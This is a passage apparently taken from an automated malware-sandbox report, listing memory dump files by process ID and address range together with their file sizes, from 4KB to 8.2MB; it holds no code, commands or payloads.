                                                                                                                                                                                                                                                                                                                56KB

                                                                                                                                                                                                                                                                                                              • memory/3456-777-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                56KB

                                                                                                                                                                                                                                                                                                              • memory/3456-776-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                56KB

                                                                                                                                                                                                                                                                                                              • memory/3480-1762-0x000001D1C2DA0000-0x000001D1C2DA1000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                              • memory/3480-1763-0x000001D1C2DA0000-0x000001D1C2DA1000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                              • memory/3480-1757-0x000001D1C2DA0000-0x000001D1C2DA1000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                              • memory/3480-1758-0x000001D1C2DA0000-0x000001D1C2DA1000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                              • memory/3480-1756-0x000001D1C2DA0000-0x000001D1C2DA1000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                              • memory/3536-1406-0x0000025DFE2A0000-0x0000025DFE355000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                724KB

                                                                                                                                                                                                                                                                                                              • memory/4168-633-0x0000000000400000-0x000000000040E000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                56KB

                                                                                                                                                                                                                                                                                                              • memory/4460-1699-0x000001AAF4080000-0x000001AAF4135000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                724KB

                                                                                                                                                                                                                                                                                                              • memory/4592-784-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-790-0x0000000000BD0000-0x0000000000BF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                128KB

                                                                                                                                                                                                                                                                                                              • memory/4592-1544-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-789-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-793-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-794-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-791-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-792-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-1545-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-787-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-795-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-786-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-783-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-788-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/4592-785-0x0000000140000000-0x0000000140835000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                8.2MB

                                                                                                                                                                                                                                                                                                              • memory/5280-1476-0x0000000000400000-0x000000000040E000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                56KB

                                                                                                                                                                                                                                                                                                              • memory/5316-1832-0x000001EC7EB80000-0x000001EC7EC35000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                724KB

                                                                                                                                                                                                                                                                                                              • memory/5948-713-0x0000000000400000-0x000000000040E000-memory.dmp

                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                56KB